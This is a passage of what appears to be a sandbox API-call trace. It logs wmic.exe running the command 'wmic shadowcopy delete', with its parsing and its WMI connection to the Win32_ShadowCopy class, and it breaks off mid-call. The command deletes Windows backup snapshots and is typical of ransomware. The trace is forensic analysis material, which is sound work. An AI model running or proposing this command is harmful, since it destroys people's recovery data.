[7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff7194d0678*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x26d57ff630 | out: ppv=0x26d57ff630*=0x1899e716f20) returned 0x0 [0139.098] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x1899e716f20, xmlSource=0x26d57ff770*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x26d57ff7e0 | out: isSuccessful=0x26d57ff7e0*=0xffff) returned 0x0 [0140.362] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1899e716f20, DOMElement=0x26d57ff638 | out: DOMElement=0x26d57ff638*=0x1899e7194b0) returned 0x0 [0140.366] malloc (_Size=0x18) returned 0x1899e8db160 [0140.370] free (_Block=0x1899e8db160) [0140.373] malloc (_Size=0x18) returned 0x1899e8db260 [0140.375] free (_Block=0x1899e8db260) [0140.375] malloc (_Size=0x18) returned 0x1899e8db260 [0140.375] malloc (_Size=0x18) returned 0x1899e8db060 [0140.375] malloc (_Size=0x30) returned 0x1899e8daad0 [0140.375] malloc (_Size=0x18) returned 0x1899e8db340 [0140.375] free (_Block=0x1899e8db340) [0140.375] malloc (_Size=0x18) returned 0x1899e8db320 [0140.376] malloc (_Size=0x18) returned 0x1899e8db200 [0140.376] SysStringLen (param_1="VALUE") returned 0x5 [0140.376] SysStringLen (param_1="TABLE") returned 0x5 [0140.376] SysStringLen (param_1="TABLE") returned 0x5 [0140.376] SysStringLen (param_1="VALUE") returned 0x5 [0140.376] malloc (_Size=0x30) returned 0x1899e8da9d0 [0140.376] malloc (_Size=0x18) returned 0x1899e8db100 [0140.376] free (_Block=0x1899e8db100) [0140.376] malloc (_Size=0x18) returned 0x1899e8db240 [0140.376] malloc (_Size=0x18) returned 0x1899e8db140 [0140.376] SysStringLen (param_1="LIST") returned 0x4 [0140.376] SysStringLen (param_1="TABLE") returned 0x5 [0140.376] malloc (_Size=0x30) returned 0x1899e8dab10 [0140.376] malloc (_Size=0x18) returned 0x1899e8db120 [0140.377] free (_Block=0x1899e8db120) [0140.377] malloc (_Size=0x18) returned 0x1899e8db340 [0140.377] malloc (_Size=0x18) returned 0x1899e8db280 [0140.377] SysStringLen (param_1="RAWXML") returned 0x6 [0140.377] SysStringLen (param_1="TABLE") returned 0x5 [0140.377] SysStringLen (param_1="RAWXML") returned 0x6 [0140.377] SysStringLen (param_1="LIST") returned 0x4 [0140.377] SysStringLen (param_1="LIST") returned 0x4 [0140.377] SysStringLen (param_1="RAWXML") returned 0x6 [0140.377] malloc (_Size=0x30) returned 0x1899e8da950 [0140.377] malloc (_Size=0x18) returned 0x1899e8db180 [0140.377] free (_Block=0x1899e8db180) [0140.377] malloc (_Size=0x18) returned 0x1899e8db220 [0140.377] malloc (_Size=0x18) returned 0x1899e8db2a0 [0140.377] SysStringLen (param_1="HTABLE") returned 0x6 [0140.377] SysStringLen (param_1="TABLE") returned 0x5 [0140.377] SysStringLen (param_1="HTABLE") returned 0x6 [0140.377] SysStringLen (param_1="LIST") returned 0x4 [0140.377] malloc (_Size=0x30) returned 0x1899e8dab50 [0140.378] malloc (_Size=0x18) returned 0x1899e8db120 [0140.378] free (_Block=0x1899e8db120) [0140.378] malloc (_Size=0x18) returned 0x1899e8db2c0 [0140.378] malloc (_Size=0x18) returned 0x1899e8db2e0 [0140.378] SysStringLen (param_1="HFORM") returned 0x5 [0140.378] SysStringLen (param_1="TABLE") returned 0x5 [0140.378] SysStringLen (param_1="HFORM") returned 0x5 [0140.378] SysStringLen (param_1="LIST") returned 0x4 [0140.378] SysStringLen (param_1="HFORM") returned 0x5 [0140.378] SysStringLen (param_1="HTABLE") returned 0x6 [0140.378] malloc (_Size=0x30) returned 0x1899e8da990 [0140.378] malloc (_Size=0x18) returned 0x1899e8db300 [0140.378] free (_Block=0x1899e8db300) [0140.378] malloc (_Size=0x18) returned 0x1899e8db360 [0140.378] malloc (_Size=0x18) returned 0x1899e8db3e0 [0140.378] SysStringLen (param_1="XML") returned 0x3 [0140.378] SysStringLen (param_1="TABLE") returned 0x5 [0140.378] SysStringLen (param_1="XML") returned 0x3 [0140.378] SysStringLen (param_1="VALUE") returned 0x5 [0140.379] SysStringLen (param_1="VALUE") returned 0x5 [0140.379] SysStringLen (param_1="XML") returned 0x3 [0140.379] malloc (_Size=0x30) returned 0x1899e8da590 [0140.379] malloc (_Size=0x18) returned 0x1899e8db080 [0140.379] free (_Block=0x1899e8db080) [0140.379] malloc (_Size=0x18) returned 0x1899e8db380 [0140.379] malloc (_Size=0x18) returned 0x1899e8db0e0 [0140.379] SysStringLen (param_1="MOF") returned 0x3 [0140.379] SysStringLen (param_1="TABLE") returned 0x5 [0140.379] SysStringLen (param_1="MOF") returned 0x3 [0140.379] SysStringLen (param_1="LIST") returned 0x4 [0140.379] SysStringLen (param_1="MOF") returned 0x3 [0140.379] SysStringLen (param_1="RAWXML") returned 0x6 [0140.379] SysStringLen (param_1="LIST") returned 0x4 [0140.379] SysStringLen (param_1="MOF") returned 0x3 [0140.379] malloc (_Size=0x30) returned 0x1899e8daa90 [0140.379] malloc (_Size=0x18) returned 0x1899e8db300 [0140.380] free (_Block=0x1899e8db300) [0140.380] malloc (_Size=0x18) returned 0x1899e8db1e0 [0140.380] malloc (_Size=0x18) returned 0x1899e8db180 [0140.380] SysStringLen (param_1="CSV") returned 0x3 [0140.380] SysStringLen (param_1="TABLE") returned 0x5 [0140.380] SysStringLen (param_1="CSV") returned 0x3 [0140.380] SysStringLen (param_1="LIST") returned 0x4 [0140.380] SysStringLen (param_1="CSV") returned 0x3 [0140.380] SysStringLen (param_1="HTABLE") returned 0x6 [0140.380] SysStringLen (param_1="CSV") returned 0x3 [0140.380] SysStringLen (param_1="HFORM") returned 0x5 [0140.380] malloc (_Size=0x30) returned 0x1899e8da790 [0140.380] malloc (_Size=0x18) returned 0x1899e8db3a0 [0140.380] free (_Block=0x1899e8db3a0) [0140.380] malloc (_Size=0x18) returned 0x1899e8db3c0 [0140.380] malloc (_Size=0x18) returned 0x1899e8db100 [0140.380] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.380] SysStringLen (param_1="TABLE") returned 0x5 [0140.380] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.380] SysStringLen (param_1="VALUE") returned 0x5 [0140.380] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.380] SysStringLen (param_1="XML") returned 0x3 [0140.381] SysStringLen (param_1="XML") returned 0x3 [0140.381] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.381] malloc (_Size=0x30) returned 0x1899e8da7d0 [0140.381] malloc (_Size=0x18) returned 0x1899e8db1a0 [0140.381] free (_Block=0x1899e8db1a0) [0140.381] malloc (_Size=0x18) returned 0x1899e8db3a0 [0140.381] malloc (_Size=0x18) returned 0x1899e8db080 [0140.381] SysStringLen (param_1="texttablewsys") returned 0xd [0140.381] SysStringLen (param_1="TABLE") returned 0x5 [0140.381] SysStringLen (param_1="texttablewsys") returned 0xd [0140.381] SysStringLen (param_1="XML") returned 0x3 [0140.381] SysStringLen (param_1="texttablewsys") returned 0xd [0140.381] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.381] SysStringLen (param_1="XML") returned 0x3 [0140.381] SysStringLen (param_1="texttablewsys") returned 0xd [0140.381] malloc (_Size=0x30) returned 0x1899e8da850 [0140.381] malloc (_Size=0x18) returned 0x1899e8db0a0 [0140.381] free (_Block=0x1899e8db0a0) [0140.382] malloc (_Size=0x18) returned 0x1899e8db300 [0140.382] malloc (_Size=0x18) returned 0x1899e8db0a0 [0140.382] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0140.382] SysStringLen (param_1="TABLE") returned 0x5 [0140.382] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0140.382] SysStringLen (param_1="XML") returned 0x3 [0140.382] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0140.382] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.382] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.382] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0140.382] malloc (_Size=0x30) returned 0x1899e8da910 [0140.382] malloc (_Size=0x18) returned 0x1899e8db0c0 [0140.382] free (_Block=0x1899e8db0c0) [0140.382] malloc (_Size=0x18) returned 0x1899e8db0c0 [0140.382] malloc (_Size=0x18) returned 0x1899e8db120 [0140.382] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0140.382] SysStringLen (param_1="TABLE") returned 0x5 [0140.382] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0140.382] SysStringLen (param_1="XML") returned 0x3 [0140.382] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0140.382] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.382] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0140.382] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0140.383] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.383] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0140.383] malloc (_Size=0x30) returned 0x1899e8da810 [0140.383] malloc (_Size=0x18) returned 0x1899e8db160 [0140.383] free (_Block=0x1899e8db160) [0140.383] malloc (_Size=0x18) returned 0x1899e8db160 [0140.383] malloc (_Size=0x18) returned 0x1899e8db1a0 [0140.383] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0140.383] SysStringLen (param_1="TABLE") returned 0x5 [0140.383] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0140.383] SysStringLen (param_1="XML") returned 0x3 [0140.383] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0140.383] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.383] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0140.383] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0140.383] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0140.383] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0140.383] malloc (_Size=0x30) returned 0x1899e8da650 [0140.383] malloc (_Size=0x18) returned 0x1899e8ddf70 [0140.384] free (_Block=0x1899e8ddf70) [0140.384] malloc (_Size=0x18) returned 0x1899e8ddc30 [0140.384] malloc (_Size=0x18) returned 0x1899e8dde50 [0140.384] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0140.384] SysStringLen (param_1="TABLE") returned 0x5 [0140.384] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0140.384] SysStringLen (param_1="XML") returned 0x3 [0140.384] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0140.384] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.384] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0140.384] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0140.384] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0140.384] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0140.384] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0140.384] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0140.384] malloc (_Size=0x30) returned 0x1899e8da890 [0140.384] malloc (_Size=0x18) returned 0x1899e8ddc90 [0140.384] free (_Block=0x1899e8ddc90) [0140.384] malloc (_Size=0x18) returned 0x1899e8dd950 [0140.384] malloc (_Size=0x18) returned 0x1899e8dde70 [0140.384] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0140.385] SysStringLen (param_1="TABLE") returned 0x5 [0140.385] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0140.385] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.385] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0140.385] SysStringLen (param_1="XML") returned 0x3 [0140.385] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0140.385] SysStringLen (param_1="texttablewsys") returned 0xd [0140.385] SysStringLen (param_1="XML") returned 0x3 [0140.385] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0140.385] malloc (_Size=0x30) returned 0x1899e8daa10 [0140.385] malloc (_Size=0x18) returned 0x1899e8ddcf0 [0140.385] free (_Block=0x1899e8ddcf0) [0140.385] malloc (_Size=0x18) returned 0x1899e8ddb70 [0140.385] malloc (_Size=0x18) returned 0x1899e8dda70 [0140.385] SysStringLen (param_1="htable-sortby") returned 0xd [0140.385] SysStringLen (param_1="TABLE") returned 0x5 [0140.385] SysStringLen (param_1="htable-sortby") returned 0xd [0140.385] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.385] SysStringLen (param_1="htable-sortby") returned 0xd [0140.385] SysStringLen (param_1="XML") returned 0x3 [0140.385] SysStringLen (param_1="htable-sortby") returned 0xd [0140.385] SysStringLen (param_1="texttablewsys") returned 0xd [0140.385] SysStringLen (param_1="htable-sortby") returned 0xd [0140.385] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0140.385] SysStringLen (param_1="XML") returned 0x3 [0140.385] SysStringLen (param_1="htable-sortby") returned 0xd [0140.385] malloc (_Size=0x30) returned 0x1899e8dab90 [0140.386] malloc (_Size=0x18) returned 0x1899e8ddcf0 [0140.386] free (_Block=0x1899e8ddcf0) [0140.386] malloc (_Size=0x18) returned 0x1899e8dded0 [0140.386] malloc (_Size=0x18) returned 0x1899e8dddf0 [0140.386] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0140.386] SysStringLen (param_1="TABLE") returned 0x5 [0140.386] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0140.386] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.386] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0140.386] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0140.386] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0140.386] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0140.386] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.386] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0140.386] malloc (_Size=0x30) returned 0x1899e8da8d0 [0140.386] malloc (_Size=0x18) returned 0x1899e8dd910 [0140.387] free (_Block=0x1899e8dd910) [0140.387] malloc (_Size=0x18) returned 0x1899e8dde10 [0140.387] malloc (_Size=0x18) returned 0x1899e8ddcb0 [0140.387] SysStringLen (param_1="wmiclimofformat") returned 0xf [0140.387] SysStringLen (param_1="TABLE") returned 0x5 [0140.387] SysStringLen (param_1="wmiclimofformat") returned 0xf [0140.387] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.387] SysStringLen (param_1="wmiclimofformat") returned 0xf [0140.387] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0140.387] SysStringLen (param_1="wmiclimofformat") returned 0xf [0140.387] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0140.387] SysStringLen (param_1="wmiclimofformat") returned 0xf [0140.387] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0140.387] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.387] SysStringLen (param_1="wmiclimofformat") returned 0xf [0140.387] malloc (_Size=0x30) returned 0x1899e8da450 [0140.387] malloc (_Size=0x18) returned 0x1899e8dde30 [0140.387] free (_Block=0x1899e8dde30) [0140.387] malloc (_Size=0x18) returned 0x1899e8ddb10 [0140.387] malloc (_Size=0x18) returned 0x1899e8ddcd0 [0140.387] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0140.387] SysStringLen (param_1="TABLE") returned 0x5 [0140.388] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0140.388] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.388] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0140.388] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0140.388] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0140.388] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0140.388] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0140.388] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0140.388] malloc (_Size=0x30) returned 0x1899e8da550 [0140.388] malloc (_Size=0x18) returned 0x1899e8ddc50 [0140.388] free (_Block=0x1899e8ddc50) [0140.388] malloc (_Size=0x18) returned 0x1899e8dde30 [0140.388] malloc (_Size=0x18) returned 0x1899e8dde90 [0140.388] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0140.388] SysStringLen (param_1="TABLE") returned 0x5 [0140.388] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0140.388] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0140.388] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0140.388] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0140.388] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0140.388] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0140.388] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0140.388] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0140.388] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0140.388] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0140.388] malloc (_Size=0x30) returned 0x1899e8da750 [0140.389] FreeThreadedDOMDocument:IUnknown:Release (This=0x1899e7194b0) returned 0x1 [0140.389] FreeThreadedDOMDocument:IUnknown:Release (This=0x1899e716f20) returned 0x0 [0140.389] free (_Block=0x1899e8db1c0) [0140.389] GetCommandLineW () returned="wmic shadowcopy delete" [0140.565] malloc (_Size=0x30) returned 0x1899e8da4d0 [0140.565] memcpy_s (in: _Destination=0x1899e8da4d0, _DestinationSize=0x2e, _Source=0x1899e51211c, _SourceSize=0x2e | out: _Destination=0x1899e8da4d0) returned 0x0 [0140.565] malloc (_Size=0x18) returned 0x1899e8dd910 [0140.565] malloc (_Size=0x18) returned 0x1899e8ddef0 [0140.565] malloc (_Size=0x18) returned 0x1899e8ddf10 [0140.565] malloc (_Size=0x18) returned 0x1899e8dda50 [0140.565] malloc (_Size=0x80) returned 0x1899e8db420 [0140.565] GetLocalTime (in: lpSystemTime=0x26d57ff858 | out: lpSystemTime=0x26d57ff858*(wYear=0x7e3, wMonth=0x7, wDayOfWeek=0x4, wDay=0x4, wHour=0x14, wMinute=0x29, wSecond=0x1a, wMilliseconds=0x2d4)) [0140.565] _vsnwprintf (in: _Buffer=0x1899e8db420, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x26d57ff708 | out: _Buffer="07-04-2019T20:41:26") returned 19 [0140.565] lstrlenW (lpString=" shadowcopy delete") returned 19 [0140.565] malloc (_Size=0x28) returned 0x1899e8d6000 [0140.565] lstrlenW (lpString=" shadowcopy delete") returned 19 [0140.566] lstrlenW (lpString=" shadowcopy delete") returned 19 [0140.566] malloc (_Size=0x28) returned 0x1899e8de050 [0140.566] lstrlenW (lpString=" shadowcopy delete") returned 19 [0140.566] lstrlenW (lpString=" shadowcopy delete") returned 19 [0140.566] lstrlenW (lpString=" shadowcopy delete") returned 19 [0140.566] malloc (_Size=0x16) returned 0x1899e8ddc50 [0140.566] lstrlenW (lpString="shadowcopy") returned 10 [0140.566] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0140.566] malloc (_Size=0x16) returned 0x1899e8dddb0 [0140.566] malloc (_Size=0x8) returned 0x1899e8de080 [0140.566] free (_Block=0x0) [0140.566] free (_Block=0x1899e8ddc50) [0140.566] lstrlenW (lpString=" shadowcopy delete") returned 19 [0140.566] malloc (_Size=0xe) returned 0x1899e8ddd30 [0140.566] lstrlenW (lpString="delete") returned 6 [0140.566] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0140.566] malloc (_Size=0xe) returned 0x1899e8dda10 [0140.566] malloc (_Size=0x10) returned 0x1899e8de010 [0140.566] memmove_s (in: _Destination=0x1899e8de010, _DestinationSize=0x8, _Source=0x1899e8de080, _SourceSize=0x8 | out: _Destination=0x1899e8de010) returned 0x0 [0140.566] free (_Block=0x1899e8de080) [0140.566] free (_Block=0x0) [0140.566] free (_Block=0x1899e8ddd30) [0140.566] malloc (_Size=0x10) returned 0x1899e8dd8f0 [0140.566] lstrlenW (lpString="QUIT") returned 4 [0140.566] lstrlenW (lpString="shadowcopy") returned 10 [0140.566] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0140.566] lstrlenW (lpString="EXIT") returned 4 [0140.566] lstrlenW (lpString="shadowcopy") returned 10 [0140.566] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0140.566] free (_Block=0x1899e8dd8f0) [0140.566] WbemLocator:IUnknown:AddRef (This=0x1899e52bbe0) returned 0x2 [0140.566] malloc (_Size=0x10) returned 0x1899e8ddd90 [0140.566] lstrlenW (lpString="/") returned 1 [0140.566] lstrlenW (lpString="shadowcopy") returned 10 [0140.566] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0140.567] lstrlenW (lpString="-") returned 1 [0140.567] lstrlenW (lpString="shadowcopy") returned 10 [0140.567] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0140.567] lstrlenW (lpString="CLASS") returned 5 [0140.567] lstrlenW (lpString="shadowcopy") returned 10 [0140.567] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0140.567] lstrlenW (lpString="PATH") returned 4 [0140.567] lstrlenW (lpString="shadowcopy") returned 10 [0140.567] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0140.567] lstrlenW (lpString="CONTEXT") returned 7 [0140.567] lstrlenW (lpString="shadowcopy") returned 10 [0140.567] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0140.567] lstrlenW (lpString="shadowcopy") returned 10 [0140.567] malloc (_Size=0x16) returned 0x1899e8ddeb0 [0140.567] lstrlenW (lpString="shadowcopy") returned 10 [0140.567] GetCurrentThreadId () returned 0xfb4 [0140.567] ??0CHString@@QEAA@XZ () returned 0x26d57ff5c0 [0140.567] malloc (_Size=0x18) returned 0x1899e8ddc50 [0140.567] malloc (_Size=0x18) returned 0x1899e8ddb90 [0140.567] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1899e52bbe0, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x7ff7194e7898 | out: ppNamespace=0x7ff7194e7898*=0x1899e581ec0) returned 0x0 [0143.148] free (_Block=0x1899e8ddb90) [0143.148] free (_Block=0x1899e8ddc50) [0143.148] CoSetProxyBlanket (pProxy=0x1899e581ec0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0143.148] ??1CHString@@QEAA@XZ () returned 0x7ffe5fac674c [0143.148] GetCurrentThreadId () returned 0xfb4 [0143.148] ??0CHString@@QEAA@XZ () returned 0x26d57ff458 [0143.149] malloc (_Size=0x18) returned 0x1899e8ddf30 [0143.149] malloc (_Size=0x18) returned 0x1899e8ddcf0 [0143.149] malloc (_Size=0x18) returned 0x1899e8ddf50 [0143.149] malloc (_Size=0x18) returned 0x1899e8ddc50 [0143.149] SysStringLen (param_1="root\\cli") returned 0x8 [0143.149] SysStringLen (param_1="\\") returned 0x1 [0143.149] malloc (_Size=0x18) returned 0x1899e8ddc70 [0143.149] SysStringLen (param_1="root\\cli\\") returned 0x9 [0143.149] SysStringLen (param_1="ms_409") returned 0x6 [0143.149] free (_Block=0x1899e8ddc50) [0143.149] free (_Block=0x1899e8ddf50) [0143.149] free (_Block=0x1899e8ddcf0) [0143.149] free (_Block=0x1899e8ddf30) [0143.149] malloc (_Size=0x18) returned 0x1899e8dd890 [0143.149] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1899e52bbe0, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x7ff7194e78a0 | out: ppNamespace=0x7ff7194e78a0*=0x1899e581b60) returned 0x0 [0143.462] free (_Block=0x1899e8dd890) [0143.462] free (_Block=0x1899e8ddc70) [0143.462] ??1CHString@@QEAA@XZ () returned 0x7ffe5fac674c [0143.462] GetCurrentThreadId () returned 0xfb4 [0143.462] ??0CHString@@QEAA@XZ () returned 0x26d57ff5d8 [0143.462] malloc (_Size=0x18) returned 0x1899e8ddcf0 [0143.462] malloc (_Size=0x18) returned 0x1899e8ddd10 [0143.462] malloc (_Size=0x18) returned 0x1899e8dd8b0 [0143.462] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0143.462] malloc (_Size=0x3a) returned 0x1899e8deb40 [0143.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff7194cac40, cbMultiByte=-1, lpWideCharStr=0x1899e8deb40, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0143.462] free (_Block=0x1899e8deb40) [0143.462] malloc (_Size=0x18) returned 0x1899e8ddd30 [0143.462] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0143.462] SysStringLen (param_1="shadowcopy") returned 0xa [0143.463] malloc (_Size=0x18) returned 0x1899e8ddf30 [0143.463] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0143.463] SysStringLen (param_1="'") returned 0x1 [0143.463] free (_Block=0x1899e8ddd30) [0143.463] free (_Block=0x1899e8dd8b0) [0143.463] free (_Block=0x1899e8ddd10) [0143.463] free (_Block=0x1899e8ddcf0) [0143.463] IWbemServices:GetObject (in: This=0x1899e581ec0, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x26d57ff500*=0x0, ppCallResult=0x0 | out: ppObject=0x26d57ff500*=0x1899e595120, ppCallResult=0x0) returned 0x0 [0143.759] malloc (_Size=0x18) returned 0x1899e8dd9f0 [0143.759] IWbemClassObject:Get (in: This=0x1899e595120, wszName="Target", lFlags=0, pVal=0x26d57ff518*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26d57ff518*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0143.759] free (_Block=0x1899e8dd9f0) [0143.759] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0143.759] malloc (_Size=0x3e) returned 0x1899e8deb40 [0143.759] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0143.759] malloc (_Size=0x18) returned 0x1899e8ddb30 [0143.759] IWbemClassObject:Get (in: This=0x1899e595120, wszName="PWhere", lFlags=0, pVal=0x26d57ff518*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26d57ff518*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0143.759] free (_Block=0x1899e8ddb30) [0143.759] lstrlenW (lpString=" Where ID = '#'") returned 15 [0143.759] malloc (_Size=0x20) returned 0x1899e8deb90 [0143.760] lstrlenW (lpString=" Where ID = '#'") returned 15 [0143.760] malloc (_Size=0x18) returned 0x1899e8ddbb0 [0143.760] IWbemClassObject:Get (in: This=0x1899e595120, wszName="Connection", lFlags=0, pVal=0x26d57ff518*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26d57ff518*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1899e5953d0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0143.760] free (_Block=0x1899e8ddbb0) [0143.760] IUnknown:QueryInterface (in: This=0x1899e5953d0, riid=0x7ff7194d0598*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26d57ff508 | out: ppvObject=0x26d57ff508*=0x1899e5953d0) returned 0x0 [0143.760] GetCurrentThreadId 